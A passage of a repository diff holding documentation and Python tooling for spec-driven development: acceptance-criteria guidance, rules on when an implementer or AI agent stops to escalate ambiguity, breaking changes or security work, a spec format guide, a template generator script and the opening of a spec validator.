- Write "Then the system works correctly" (not testable)
- Combine multiple scenarios in one AC
- Use subjective words: "quickly", "properly", "nicely", "user-friendly"
- Skip the precondition — Given is required even if it seems obvious
- Write Given/When/Then as prose paragraphs — use the structured format
### Smell Tests
If your AC has any of these, rewrite it:
| Smell | Example | Fix |
|-------|---------|-----|
| No Given clause | "When user clicks, then page loads" | Add "Given user is on the dashboard" |
| Vague Then | "Then it works" | Specify status code, body, side effects |
| Multiple Whens | "When user clicks A and then clicks B" | Split into two ACs |
| Implementation detail | "Then the Redux store is updated" | Focus on user-observable outcome |
| No requirement reference | "AC-5: Dashboard loads" | "AC-5: Dashboard loads (FR-7)" |

View File

@@ -0,0 +1,273 @@
# Bounded Autonomy Rules
Decision framework for when an agent (human or AI) should stop and ask vs. continue working autonomously during spec-driven development.
---
## The Core Principle
**Autonomy is earned by clarity.** The clearer the spec, the more autonomy the implementer has. The more ambiguous the spec, the more the implementer must stop and ask.
This is not about trust. It is about risk. A clear spec means low risk of building the wrong thing. An ambiguous spec means high risk.
---
## Decision Matrix
| Signal | Action | Rationale |
|--------|--------|-----------|
| Spec is Approved, requirement is clear, tests exist | **Continue** | Low risk. Build it. |
| Requirement is clear but no test exists yet | **Continue** (write the test first) | You can infer the test from the requirement. |
| Requirement uses SHOULD/MAY keywords | **Continue** with your best judgment | These are intentionally flexible. Document your choice. |
| Requirement is ambiguous (multiple valid interpretations) | **STOP** if ambiguity > 30% of the task | Ask the spec author to clarify. |
| Implementation requires changing an API contract | **STOP** always | Breaking changes need explicit approval. |
| Implementation requires a new database migration | **STOP** if it changes existing columns/tables | New tables are lower risk than schema changes. |
| Security-related change (auth, crypto, PII) | **STOP** always | Security changes need review regardless of spec clarity. |
| Performance-critical path with no benchmark data | **STOP** | You cannot prove NFR compliance without measurement. |
| Bug found in existing code unrelated to spec | **STOP** — file a separate issue | Do not fix unrelated bugs in a spec-scoped implementation. |
| Spec says "N/A" for a section you think needs content | **STOP** | The author may have a reason, or they may have missed it. |
---
## Ambiguity Scoring
When you encounter ambiguity, quantify it before deciding to stop or continue.
### How to Score Ambiguity
For each requirement you are implementing, ask:
1. **Can I write a test for this right now?** (No = +20% ambiguity)
2. **Are there multiple valid interpretations?** (Yes = +20% ambiguity)
3. **Does the spec contradict itself?** (Yes = +30% ambiguity)
4. **Am I making assumptions about user behavior?** (Yes = +15% ambiguity)
5. **Does this depend on an undocumented external system?** (Yes = +15% ambiguity)
### Threshold
| Ambiguity Score | Action |
|-----------------|--------|
| 0-15% | Continue. Minor ambiguity is normal. Document your interpretation. |
| 16-30% | Continue with caution. Add a comment explaining your interpretation. Flag in PR. |
| 31-50% | STOP. Ask the spec author one specific question. Do not continue until answered. |
| 51%+ | STOP. The spec is incomplete. Request a revision before proceeding. |
### Example
**Requirement:** "FR-7: The system MUST notify the user when their order ships."
Questions:
1. Can I write a test? Partially — I know WHAT to test but not HOW (email? push? in-app?). +20%
2. Multiple interpretations? Yes — notification channel is unclear. +20%
3. Contradicts itself? No. +0%
4. Assuming user behavior? Yes — I am assuming they want email. +15%
5. Undocumented external system? Maybe — depends on notification service. +15%
**Total: 70%.** STOP. The spec needs to specify the notification channel.
---
## Scope Creep Detection
### What Is Scope Creep?
Scope creep is implementing functionality not described in the spec. It includes:
- Adding features the spec does not mention
- "Improving" behavior beyond what acceptance criteria require
- Handling edge cases the spec explicitly excluded
- Refactoring unrelated code "while you're in there"
- Building infrastructure for future features
### Detection Patterns
| Pattern | Example | Risk |
|---------|---------|------|
| "While I'm here..." | Refactoring a utility function unrelated to the spec | Medium — unreviewed changes |
| "This would be easy to add..." | Adding a search filter the spec does not mention | High — untested, unspecified |
| "Users will probably want..." | Building a feature based on assumption | High — may conflict with future specs |
| "This is obviously needed..." | Adding logging, metrics, or caching not in NFRs | Medium — may be overkill or wrong approach |
| "The spec forgot to mention..." | Building something the spec excluded | Critical — may be deliberately excluded |
### Response Protocol
When you detect scope creep in your own work:
1. **Stop immediately.** Do not commit the extra code.
2. **Check Out of Scope.** Is this item explicitly excluded?
3. **If excluded:** Delete the code. The spec author had a reason.
4. **If not mentioned:** File a note for the spec author. Ask if it should be added.
5. **If approved:** Update the spec FIRST, then implement.
---
## Breaking Change Identification
### What Counts as a Breaking Change?
A breaking change is any modification that could cause existing clients, tests, or integrations to fail.
| Category | Breaking | Not Breaking |
|----------|----------|--------------|
| API endpoint removed | Yes | - |
| API endpoint added | - | No |
| Required field added to request | Yes | - |
| Optional field added to request | - | No |
| Field removed from response | Yes | - |
| Field added to response | - | No (usually) |
| Status code changed | Yes | - |
| Error code string changed | Yes | - |
| Database column removed | Yes | - |
| Database column added (nullable) | - | No |
| Database column added (not null, no default) | Yes | - |
| Enum value removed | Yes | - |
| Enum value added | - | No (usually) |
| Behavior change for existing input | Yes | - |
### Breaking Change Protocol
1. **Identify** the breaking change before implementing it.
2. **Escalate** immediately — do not implement without approval.
3. **Propose** a migration path (versioned API, feature flag, deprecation period).
4. **Document** the breaking change in the spec's changelog.
---
## Security Implication Checklist
Any change touching the following areas MUST be escalated, even if the spec seems clear.
### Always Escalate
- [ ] Authentication logic (login, logout, token generation)
- [ ] Authorization logic (role checks, permission gates)
- [ ] Encryption/hashing (algorithm choice, key management)
- [ ] PII handling (storage, transmission, logging)
- [ ] Input validation bypass (new endpoints, parameter changes)
- [ ] Rate limiting changes (thresholds, scope)
- [ ] CORS or CSP policy changes
- [ ] File upload handling
- [ ] SQL/NoSQL query construction (injection risk)
- [ ] Deserialization of user input
- [ ] Redirect URLs from user input (open redirect risk)
- [ ] Secrets in code, config, or logs
### Security Escalation Template
```markdown
## Security Escalation: [Title]
**Affected area:** [authentication/authorization/encryption/PII/etc.]
**Spec reference:** [FR-N or NFR-SN]
**Risk:** [What could go wrong if implemented incorrectly]
**Current protection:** [What exists today]
**Proposed change:** [What the spec requires]
**My concern:** [Specific security question]
**Recommendation:** [Proposed approach with security rationale]
```
---
## Escalation Templates
### Template 1: Ambiguous Requirement
```markdown
## Escalation: Ambiguous Requirement
**Blocked on:** FR-7 ("notify the user when their order ships")
**Ambiguity score:** 70%
**Question:** What notification channel should be used?
**Options considered:**
A. Email only — Pros: simple, reliable. Cons: not real-time.
B. Email + in-app notification — Pros: covers both async and real-time. Cons: more implementation effort.
C. Configurable per user — Pros: maximum flexibility. Cons: requires preference UI (not in spec).
**My recommendation:** B (email + in-app). Covers most use cases without requiring new UI.
**Impact of waiting:** Cannot implement FR-7 until resolved. No other work blocked.
```
### Template 2: Missing Edge Case
```markdown
## Escalation: Missing Edge Case
**Related to:** FR-2 (password reset link expires after 1 hour)
**Scenario:** User clicks a reset link, but their account was deleted between requesting and clicking.
**Not in spec:** Edge cases section does not cover this.
**Options considered:**
A. Show generic "link invalid" error — Pros: secure (no info leak). Cons: confusing for deleted user.
B. Show "account not found" error — Pros: clear. Cons: confirms account deletion to link holder.
**My recommendation:** A. Security over clarity — do not reveal account existence.
**Impact of waiting:** Can implement other ACs; this is blocking only AC-2 completion.
```
### Template 3: Potential Breaking Change
```markdown
## Escalation: Potential Breaking Change
**Spec requires:** Adding required field "role" to POST /api/users request (FR-6)
**Current behavior:** POST /api/users accepts {email, password, displayName}
**Breaking:** Yes — existing clients will get 400 errors (missing required field)
**Options considered:**
A. Make "role" required as spec says — Pros: matches spec. Cons: breaks mobile app v2.1.
B. Make "role" optional with default "user" — Pros: backward compatible. Cons: deviates from spec.
C. Version the API (v2) — Pros: clean separation. Cons: maintenance burden.
**My recommendation:** B. Default to "user" for backward compatibility. Update spec to reflect MAY instead of MUST.
**Impact of waiting:** Frontend team is building against the new contract. Need answer within 2 days.
```
### Template 4: Scope Creep Proposal
```markdown
## Escalation: Potential Addition to Spec
**Context:** While implementing FR-2 (password validation), I noticed the spec does not mention password strength feedback.
**Not in spec:** No requirement for showing strength indicators.
**Checked Out of Scope:** Not listed there either.
**Proposal:** Add FR-7: "The system SHOULD display password strength feedback during registration."
**Effort:** ~2 hours additional implementation.
**Question:** Should this be added to current spec, filed as a separate spec, or skipped?
**Impact of waiting:** FR-2 implementation is not blocked. This is an enhancement question only.
```
---
## Quick Reference Card
```
CONTINUE if:
- Spec is approved
- Requirement uses MUST and is unambiguous
- Tests can be written directly from the AC
- Changes are additive and non-breaking
- You are refactoring internals only (no behavior change)
STOP if:
- Ambiguity > 30%
- Any breaking change
- Any security-related change
- Spec says N/A but you think it shouldn't
- You are about to build something not in the spec
- You cannot write a test for the requirement
- External dependency is undocumented
```
---
## Anti-Patterns in Autonomy
### 1. "I'll Ask Later"
Continuing past an ambiguity checkpoint because asking feels slow. The rework from building the wrong thing is always slower.
### 2. "It's Obviously Needed"
Assuming a missing feature was accidentally omitted. It may have been deliberately excluded. Check Out of Scope first.
### 3. "The Spec Is Wrong"
Implementing what you think the spec SHOULD say instead of what it DOES say. If the spec is wrong, escalate. Do not silently "fix" it.
### 4. "Just This Once"
Bypassing the escalation protocol for a "small" change. Small changes compound. The protocol exists because humans are bad at judging risk in the moment.
### 5. "I Already Built It"
Presenting completed work that was never in the spec and hoping it gets accepted. This creates review pressure and wastes everyone's time if rejected. Ask BEFORE building.

View File

@@ -0,0 +1,423 @@
# Spec Format Guide
Complete reference for writing feature specifications. Every section is explained with examples, rationale, and common mistakes.
---
## The Spec Document Structure
A spec has 9 mandatory sections. If a section does not apply, write "N/A — [reason]" so reviewers know it was considered, not skipped.
```
1. Title and Metadata
2. Context
3. Functional Requirements
4. Non-Functional Requirements
5. Acceptance Criteria
6. Edge Cases and Error Scenarios
7. API Contracts
8. Data Models
9. Out of Scope
```
---
## Section 1: Title and Metadata
```markdown
# Spec: [Feature Name]
**Author:** Jane Doe
**Date:** 2026-03-25
**Status:** Draft | In Review | Approved | Superseded
**Reviewers:** John Smith, Alice Chen
**Related specs:** SPEC-018 (User Registration), SPEC-023 (Session Management)
```
### Status Lifecycle
| Status | Meaning | Who Can Change |
|--------|---------|----------------|
| Draft | Author is still writing. Not ready for review. | Author |
| In Review | Ready for feedback. Implementation blocked. | Author |
| Approved | Reviewed and accepted. Implementation may begin. | Reviewer |
| Superseded | Replaced by a newer spec. Link to replacement. | Author |
**Rule:** Implementation MUST NOT begin until status is "Approved."
---
## Section 2: Context
The context section answers: **Why does this feature exist?**
### What to Include
- The problem being solved (with evidence: support tickets, metrics, user research)
- The current state (what exists today and what is broken or missing)
- The business justification (revenue impact, cost savings, user retention)
- Constraints or dependencies (regulatory, technical, timeline)
### What to Exclude
- Implementation details (that is the engineer's job)
- Solution proposals (the spec says WHAT, not HOW)
- Lengthy background (2-4 paragraphs maximum)
### Good Example
```markdown
## Context
Users who forget their passwords currently have no self-service recovery.
Support handles ~200 password reset requests per week, consuming approximately
8 hours of agent time at $45/hour ($360/week, $18,720/year). Additionally,
12% of users who contact support for a reset never return.
This feature provides self-service password reset via email, eliminating
support burden and reducing user churn from the reset flow.
```
### Bad Example
```markdown
## Context
We need a password reset feature. Users forget their passwords sometimes
and need to reset them. We should build this.
```
**Why it is bad:** No evidence, no metrics, no business justification. "We should build this" is not a reason.
---
## Section 3: Functional Requirements — RFC 2119
### RFC 2119 Keywords
These keywords have precise meanings per [RFC 2119](https://www.ietf.org/rfc/rfc2119.txt). Do not use them casually.
| Keyword | Meaning | Testing Implication |
|---------|---------|---------------------|
| **MUST** | Absolute requirement. The implementation is non-conformant without this. | Must have a passing test. Failure = release blocker. |
| **MUST NOT** | Absolute prohibition. Doing this = broken implementation. | Must have a test proving this cannot happen. |
| **SHOULD** | Strongly recommended. Can be omitted only with documented justification. | Should have a test. Omission requires written rationale. |
| **SHOULD NOT** | Strongly discouraged. Can be done only with documented justification. | Should have a test confirming the behavior does not occur. |
| **MAY** | Truly optional. Implementer's discretion. | Test is optional. Document if implemented. |
### Writing Good Requirements
**Each requirement MUST be:**
1. **Atomic** — One behavior per requirement. Not "The system MUST authenticate users and log them in."
2. **Testable** — You can write a test that proves it works or does not.
3. **Numbered** — Sequential FR-N format for traceability.
4. **Specific** — No ambiguous adjectives ("fast", "secure", "user-friendly").
### Good Requirements
```markdown
- FR-1: The system MUST accept login via email and password.
- FR-2: The system MUST reject passwords shorter than 8 characters.
- FR-3: The system MUST return a JWT access token on successful login.
- FR-4: The system MUST NOT include the password hash in any API response.
- FR-5: The system SHOULD support "remember me" with a 30-day refresh token.
- FR-6: The system MAY display last login time on the dashboard.
```
### Bad Requirements
```markdown
- FR-1: The login system must be fast and secure.
(Untestable: what is "fast"? What is "secure"?)
- FR-2: The system must handle all edge cases.
(Vague: which edge cases? This delegates the spec to the implementer.)
- FR-3: Users should be able to log in easily.
(Subjective: "easily" is not measurable.)
```
---
## Section 4: Non-Functional Requirements
Non-functional requirements define quality attributes. Every requirement needs a **measurable threshold**.
### Categories
#### Performance
```markdown
- NFR-P1: Login API MUST respond in < 500ms (p95) under 1,000 concurrent users.
- NFR-P2: Dashboard page MUST achieve Largest Contentful Paint < 2.5s.
- NFR-P3: Search results MUST return within 200ms for queries under 100 characters.
```
**Bad:** "The system should be fast." (Not measurable.)
#### Security
```markdown
- NFR-S1: All API endpoints MUST require authentication except /health and /login.
- NFR-S2: Failed login attempts MUST be rate-limited to 5 per minute per IP.
- NFR-S3: Passwords MUST be hashed with bcrypt (cost factor >= 12).
- NFR-S4: Session tokens MUST be invalidated on password change.
```
#### Accessibility
```markdown
- NFR-A1: All form inputs MUST have associated labels (WCAG 1.3.1).
- NFR-A2: Color contrast MUST meet 4.5:1 ratio (WCAG 1.4.3).
- NFR-A3: All interactive elements MUST be keyboard-navigable (WCAG 2.1.1).
```
#### Scalability
```markdown
- NFR-SC1: The system SHOULD handle 50,000 registered users.
- NFR-SC2: Database queries MUST use indexes; no full table scans on tables > 10K rows.
```
#### Reliability
```markdown
- NFR-R1: The authentication service MUST maintain 99.9% uptime (< 8.77h downtime/year).
- NFR-R2: Data MUST NOT be lost on service restart (durable storage required).
```
---
## Section 5: Acceptance Criteria — Given/When/Then
Acceptance criteria are the contract between the spec author and the implementer. They define "done."
### The Given/When/Then Pattern
```
Given [precondition — the world is in this state]
When [action — the user or system does this]
Then [outcome — this observable result occurs]
And [additional outcome — and also this]
```
### Rules for Acceptance Criteria
1. **Every AC MUST reference at least one FR-* or NFR-*.** Orphaned criteria indicate missing requirements.
2. **Every AC MUST be testable by a machine.** If you cannot write an automated test, rewrite the criterion.
3. **No subjective language.** Not "should look good" but "MUST render within the design-system grid."
4. **One scenario per AC.** If you have multiple Given/When/Then blocks, split into separate ACs.
### Example: Authentication Feature
```markdown
### AC-1: Successful login (FR-1, FR-3)
Given a registered user with email "user@example.com" and password "P@ssw0rd123"
When they POST /api/auth/login with those credentials
Then they receive a 200 response with a valid JWT token
And the token expires in 24 hours
And the response includes the user's display name
### AC-2: Invalid password (FR-1)
Given a registered user with email "user@example.com"
When they POST /api/auth/login with an incorrect password
Then they receive a 401 response
And the response body contains error "INVALID_CREDENTIALS"
And no token is issued
### AC-3: Short password rejected on registration (FR-2)
Given a new user attempting to register
When they submit a password with 7 characters
Then they receive a 400 response
And the response body contains error "PASSWORD_TOO_SHORT"
And the account is not created
```
### Common Mistakes
| Mistake | Example | Fix |
|---------|---------|-----|
| Vague outcome | "Then the system works correctly" | "Then the response status is 200 and body contains {field: value}" |
| Missing precondition | "When user logs in, then token is issued" | "Given a registered user, when they POST valid credentials, then..." |
| Multiple scenarios | AC with 3 different When clauses | Split into 3 separate ACs |
| No FR reference | "AC-5: User sees dashboard" | "AC-5: User sees dashboard (FR-7)" |
---
## Section 6: Edge Cases and Error Scenarios
### What Counts as an Edge Case
- Invalid or malformed input
- External service failures (API down, timeout, rate-limited)
- Concurrent operations (race conditions)
- Boundary values (empty string, max length, zero, negative numbers)
- State conflicts (already exists, already deleted, expired)
### Format
```markdown
- EC-1: Empty email field → Return 400 with error "EMAIL_REQUIRED". Do not call auth service.
- EC-2: Email exceeds 255 characters → Return 400 with error "EMAIL_TOO_LONG".
- EC-3: OAuth provider returns 503 → Return 503 with "Service temporarily unavailable". Retry after 30s.
- EC-4: Two users register same email simultaneously → First succeeds, second gets 409 Conflict.
- EC-5: User clicks reset link after password was already changed → Show "Link already used."
```
### Coverage Rule
For every external dependency, specify at least one failure:
- Database: connection lost, timeout, constraint violation
- API: 4xx, 5xx, timeout, invalid response
- File system: file not found, permission denied, disk full
- User input: empty, too long, wrong type, injection attempt
---
## Section 7: API Contracts
### Notation
Use TypeScript-style interfaces. They are readable by both frontend and backend engineers.
```typescript
interface CreateUserRequest {
email: string; // MUST be valid email, max 255 chars
password: string; // MUST be 8-128 chars
displayName: string; // MUST be 1-100 chars, no HTML
role?: "user" | "admin"; // Default: "user"
}
```
### What to Define
For each endpoint:
1. **HTTP method and path** (e.g., POST /api/users)
2. **Request body** (fields, types, constraints, defaults)
3. **Success response** (status code, body shape)
4. **Error responses** (each error code with its status and body)
5. **Headers** (Authorization, Content-Type, custom headers)
### Error Response Convention
```typescript
interface ApiError {
error: string; // Machine-readable code: "INVALID_CREDENTIALS"
message: string; // Human-readable: "The email or password is incorrect."
details?: Record<string, string>; // Field-level errors for validation
}
```
Always include:
- 400 for validation errors
- 401 for authentication failures
- 403 for authorization failures
- 404 for not found
- 409 for conflicts
- 429 for rate limiting
- 500 for unexpected errors (keep it generic — do not leak internals)
---
## Section 8: Data Models
### Table Format
```markdown
### User
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | PK, auto-generated, immutable |
| email | varchar(255) | Unique, not null, valid email |
| passwordHash | varchar(60) | Not null, bcrypt, never in API responses |
| displayName | varchar(100) | Not null |
| role | enum('user','admin') | Default: 'user' |
| createdAt | timestamp | UTC, immutable, auto-set |
| updatedAt | timestamp | UTC, auto-updated |
| deletedAt | timestamp | Null unless soft-deleted |
```
### Rules
1. **Every entity in requirements MUST have a data model.** If FR-1 mentions "users", there must be a User model.
2. **Constraints MUST match requirements.** If FR-2 says passwords >= 8 chars, the model must note that.
3. **Include indexes.** If NFR-P1 says < 500ms queries, note which fields need indexes.
4. **Specify soft vs. hard delete.** State it explicitly.
---
## Section 9: Out of Scope
### Why This Section Matters
Out of Scope prevents scope creep during implementation. When someone says "while you're in there, could you also..." — point them to this section.
### Format
```markdown
- OS-1: Multi-factor authentication — Planned for Q3 (SPEC-045).
- OS-2: Social login beyond Google/GitHub — Insufficient user demand (< 2% requests).
- OS-3: Admin impersonation — Security review pending. Separate spec required.
- OS-4: Password strength meter UI — Nice-to-have, deferred to design sprint 12.
```
### Rules
1. **Every feature discussed and rejected MUST be listed.** This creates a paper trail.
2. **Include the reason.** "Not now" is not a reason. "Insufficient demand (< 2% of requests)" is.
3. **Link to future specs** when the exclusion is a deferral, not a rejection.
---
## Feature-Type Templates
### CRUD Feature
Focus on: all 4 operations, validation rules, authorization, pagination for list endpoints.
```markdown
- FR-1: Users MUST be able to create a [resource] with [required fields].
- FR-2: Users MUST be able to read a [resource] by ID.
- FR-3: Users MUST be able to list [resources] with pagination (default: 20/page).
- FR-4: Users MUST be able to update [mutable fields] of their own [resources].
- FR-5: Users MUST be able to delete their own [resources] (soft delete).
- FR-6: Users MUST NOT be able to modify or delete other users' [resources].
```
### Integration Feature
Focus on: external API contract, retry/fallback behavior, data mapping, error propagation.
```markdown
- FR-1: The system MUST call [external API] to [purpose].
- FR-2: The system MUST retry failed calls up to 3 times with exponential backoff.
- FR-3: The system MUST map [external field] to [internal field].
- FR-4: The system MUST NOT expose external API errors directly to users.
- EC-1: External API returns 5xx → Log error, return cached data if < 1h old, else 503.
- EC-2: External API response schema changes → Log warning, reject unmappable fields.
```
### Migration Feature
Focus on: backward compatibility, rollback plan, data integrity, zero-downtime deployment.
```markdown
- FR-1: The migration MUST transform [old schema] to [new schema].
- FR-2: The migration MUST be reversible (rollback script required).
- FR-3: The migration MUST NOT cause downtime exceeding 30 seconds.
- FR-4: The migration MUST validate data integrity post-run (row count, checksum).
- EC-1: Migration fails mid-way → Automatic rollback, alert ops team.
- EC-2: New schema has stricter constraints → Log invalid rows, quarantine for manual review.
```
---
## Checklist: Is This Spec Ready for Review?
- [ ] Every section is filled (or marked N/A with reason)
- [ ] All requirements use FR-N, NFR-N numbering
- [ ] RFC 2119 keywords are UPPERCASE
- [ ] Every AC references at least one requirement
- [ ] Every AC uses Given/When/Then
- [ ] Edge cases cover each external dependency failure
- [ ] API contracts define success AND error responses
- [ ] Data models include all entities from requirements
- [ ] Out of Scope lists items discussed and rejected
- [ ] No placeholder text remains
- [ ] Context includes evidence (metrics, tickets, research)
- [ ] Status is "In Review" (not still "Draft")

View File

@@ -0,0 +1,338 @@
#!/usr/bin/env python3
"""
Spec Generator - Generates a feature specification template from a name and description.
Produces a complete spec document with all required sections pre-filled with
guidance prompts. Output can be markdown or structured JSON.
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import sys
import textwrap
from datetime import date
from pathlib import Path
from typing import Dict, Any, Optional
SPEC_TEMPLATE = """\
# Spec: {name}
**Author:** [your name]
**Date:** {date}
**Status:** Draft
**Reviewers:** [list reviewers]
**Related specs:** [links to related specs, or "None"]
---
## Context
{context_prompt}
---
## Functional Requirements
_Use RFC 2119 keywords: MUST, MUST NOT, SHOULD, SHOULD NOT, MAY._
_Each requirement is a single, testable statement. Number sequentially._
- FR-1: The system MUST [describe required behavior].
- FR-2: The system MUST [describe another required behavior].
- FR-3: The system SHOULD [describe recommended behavior].
- FR-4: The system MAY [describe optional behavior].
- FR-5: The system MUST NOT [describe prohibited behavior].
---
## Non-Functional Requirements
### Performance
- NFR-P1: [Operation] MUST complete in < [threshold] (p95) under [conditions].
- NFR-P2: [Operation] SHOULD handle [throughput] requests per second.
### Security
- NFR-S1: All data in transit MUST be encrypted via TLS 1.2+.
- NFR-S2: The system MUST rate-limit [operation] to [limit] per [period] per [scope].
### Accessibility
- NFR-A1: [UI component] MUST meet WCAG 2.1 AA standards.
- NFR-A2: Error messages MUST be announced to screen readers.
### Scalability
- NFR-SC1: The system SHOULD handle [number] concurrent [entities].
### Reliability
- NFR-R1: The [service] MUST maintain [percentage]% uptime.
---
## Acceptance Criteria
_Write in Given/When/Then (Gherkin) format._
_Each criterion MUST reference at least one FR-* or NFR-*._
### AC-1: [Descriptive name] (FR-1)
Given [precondition]
When [action]
Then [expected result]
And [additional assertion]
### AC-2: [Descriptive name] (FR-2)
Given [precondition]
When [action]
Then [expected result]
### AC-3: [Descriptive name] (NFR-S2)
Given [precondition]
When [action]
Then [expected result]
And [additional assertion]
---
## Edge Cases
_For every external dependency (API, database, file system, user input), specify at least one failure scenario._
- EC-1: [Input/condition] -> [expected behavior].
- EC-2: [Input/condition] -> [expected behavior].
- EC-3: [External service] is unavailable -> [expected behavior].
- EC-4: [Concurrent/race condition] -> [expected behavior].
- EC-5: [Boundary value] -> [expected behavior].
---
## API Contracts
_Define request/response shapes using TypeScript-style notation._
_Cover all endpoints referenced in functional requirements._
### [METHOD] [endpoint]
Request:
```typescript
interface [Name]Request {{
field: string; // Description, constraints
optional?: number; // Default: [value]
}}
```
Success Response ([status code]):
```typescript
interface [Name]Response {{
id: string;
field: string;
createdAt: string; // ISO 8601
}}
```
Error Response ([status code]):
```typescript
interface [Name]Error {{
error: "[ERROR_CODE]";
message: string;
}}
```
---
## Data Models
_Define all entities referenced in requirements._
### [Entity Name]
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | Primary key, auto-generated |
| [field] | [type] | [constraints] |
| createdAt | timestamp | UTC, immutable |
| updatedAt | timestamp | UTC, auto-updated |
---
## Out of Scope
_Explicit exclusions prevent scope creep. If someone asks for these during implementation, point them here._
- OS-1: [Feature/capability] — [reason for exclusion or link to future spec].
- OS-2: [Feature/capability] — [reason for exclusion].
- OS-3: [Feature/capability] — deferred to [version/sprint].
---
## Open Questions
_Track unresolved questions here. Each must be resolved before status moves to "Approved"._
- [ ] Q1: [Question] — Owner: [name], Due: [date]
- [ ] Q2: [Question] — Owner: [name], Due: [date]
"""
def generate_context_prompt(description: str) -> str:
    """Build the seed text for the spec's Context section.

    When *description* is supplied it becomes the opening paragraph,
    followed by italicized prompts telling the author what to expand.
    Without a description, a generic guidance paragraph is returned.
    """
    if not description:
        return textwrap.dedent("""\
            _Why does this feature exist? What problem does it solve? What is the business
            motivation? Include links to user research, support tickets, or metrics that
            justify this work. 2-4 paragraphs maximum._""")
    return textwrap.dedent(f"""\
        {description}
        _Expand this context section to include:_
        _- Why does this feature exist? What problem does it solve?_
        _- What is the business motivation? (link to user research, support tickets, metrics)_
        _- What is the current state? (what exists today, what pain points exist)_
        _- 2-4 paragraphs maximum._""")
def generate_spec(name: str, description: str) -> str:
    """Render the markdown spec template for *name*.

    The Context section is seeded from *description* via
    generate_context_prompt(); the date is set to today (ISO 8601).
    """
    return SPEC_TEMPLATE.format(
        name=name,
        date=date.today().isoformat(),
        context_prompt=generate_context_prompt(description),
    )
def generate_spec_json(name: str, description: str) -> Dict[str, Any]:
    """Build the structured (JSON-serializable) form of the spec template.

    Returns a dict with two top-level keys: "spec" (the template content,
    pre-filled with placeholder strings) and "metadata" (provenance info
    about how the template was generated).
    """
    # Template metadata: author/reviewers stay as placeholders for the user.
    metadata = {
        "author": "[your name]",
        "date": date.today().isoformat(),
        "status": "Draft",
        "reviewers": [],
        "related_specs": [],
    }
    # Five seed requirements covering each RFC 2119 keyword class.
    functional = [
        {"id": "FR-1", "keyword": "MUST", "description": "[describe required behavior]"},
        {"id": "FR-2", "keyword": "MUST", "description": "[describe another required behavior]"},
        {"id": "FR-3", "keyword": "SHOULD", "description": "[describe recommended behavior]"},
        {"id": "FR-4", "keyword": "MAY", "description": "[describe optional behavior]"},
        {"id": "FR-5", "keyword": "MUST NOT", "description": "[describe prohibited behavior]"},
    ]
    non_functional = {
        "performance": [
            {"id": "NFR-P1", "description": "[operation] MUST complete in < [threshold]"},
        ],
        "security": [
            {"id": "NFR-S1", "description": "All data in transit MUST be encrypted via TLS 1.2+"},
        ],
        "accessibility": [
            {"id": "NFR-A1", "description": "[UI component] MUST meet WCAG 2.1 AA"},
        ],
        "scalability": [
            {"id": "NFR-SC1", "description": "[system] SHOULD handle [N] concurrent [entities]"},
        ],
        "reliability": [
            {"id": "NFR-R1", "description": "[service] MUST maintain [N]% uptime"},
        ],
    }
    acceptance = [
        {
            "id": "AC-1",
            "name": "[descriptive name]",
            "references": ["FR-1"],
            "given": "[precondition]",
            "when": "[action]",
            "then": "[expected result]",
        },
    ]
    api_contracts = [
        {
            "method": "[METHOD]",
            "endpoint": "[/api/path]",
            "request_fields": [{"name": "field", "type": "string", "constraints": "[description]"}],
            "success_response": {"status": 200, "fields": []},
            "error_response": {"status": 400, "fields": []},
        },
    ]
    data_models = [
        {
            "name": "[Entity]",
            "fields": [
                {"name": "id", "type": "UUID", "constraints": "Primary key, auto-generated"},
            ],
        },
    ]
    spec = {
        "title": f"Spec: {name}",
        "metadata": metadata,
        "context": description or "[Describe why this feature exists]",
        "functional_requirements": functional,
        "non_functional_requirements": non_functional,
        "acceptance_criteria": acceptance,
        "edge_cases": [
            {"id": "EC-1", "condition": "[input/condition]", "behavior": "[expected behavior]"},
        ],
        "api_contracts": api_contracts,
        "data_models": data_models,
        "out_of_scope": [
            {"id": "OS-1", "description": "[feature/capability]", "reason": "[reason]"},
        ],
        "open_questions": [],
    }
    return {
        "spec": spec,
        "metadata": {
            "generated_by": "spec_generator.py",
            "feature_name": name,
            "feature_description": description,
        },
    }
def main():
    """CLI entry point: parse arguments and emit a spec template.

    Writes markdown (default) or JSON either to stdout or to the path
    given via --output (parent directories are created as needed).
    """
    parser = argparse.ArgumentParser(
        description="Generate a feature specification template from a name and description.",
        epilog="Example: python spec_generator.py --name 'User Auth' --description 'OAuth 2.0 login flow'",
    )
    parser.add_argument(
        "--name",
        required=True,
        help="Feature name (used as spec title)",
    )
    parser.add_argument(
        "--description",
        default="",
        help="Brief feature description (used to seed the context section)",
    )
    parser.add_argument(
        "--output",
        "-o",
        default=None,
        help="Output file path (default: stdout)",
    )
    parser.add_argument(
        "--format",
        choices=["md", "json"],
        default="md",
        help="Output format: md (markdown) or json (default: md)",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_flag",
        help="Shorthand for --format json",
    )
    args = parser.parse_args()

    # --json is a convenience flag that overrides --format.
    chosen_format = "json" if args.json_flag else args.format
    if chosen_format == "json":
        output = json.dumps(generate_spec_json(args.name, args.description), indent=2)
    else:
        output = generate_spec(args.name, args.description)

    if args.output is None:
        print(output)
    else:
        destination = Path(args.output)
        destination.parent.mkdir(parents=True, exist_ok=True)
        destination.write_text(output, encoding="utf-8")
        # Status message goes to stderr so stdout stays clean for piping.
        print(f"Spec template written to {destination}", file=sys.stderr)
    sys.exit(0)
# Script entry point: run the CLI only when executed directly, not on import.
if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,461 @@
#!/usr/bin/env python3
"""
Spec Validator - Validates a feature specification for completeness and quality.
Checks that a spec document contains all required sections, uses RFC 2119 keywords
correctly, has acceptance criteria in Given/When/Then format, and scores overall
completeness from 0-100.
Sections checked:
- Context, Functional Requirements, Non-Functional Requirements
- Acceptance Criteria, Edge Cases, API Contracts, Data Models, Out of Scope
Exit codes: 0 = pass, 1 = warnings, 2 = critical (or --strict with score < 80)
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import re
import sys
from pathlib import Path
from typing import Dict, List, Any, Tuple
# Section definitions: (key, display_name, required_header_patterns, weight).
# `weight` is the section's contribution to the overall completeness score;
# a section counts as present when ANY of its patterns matches a line
# (case-insensitively) — see SpecValidator._check_sections_present.
SECTIONS = [
    ("context", "Context", [r"^##\s+Context"], 10),
    ("functional_requirements", "Functional Requirements", [r"^##\s+Functional\s+Requirements"], 15),
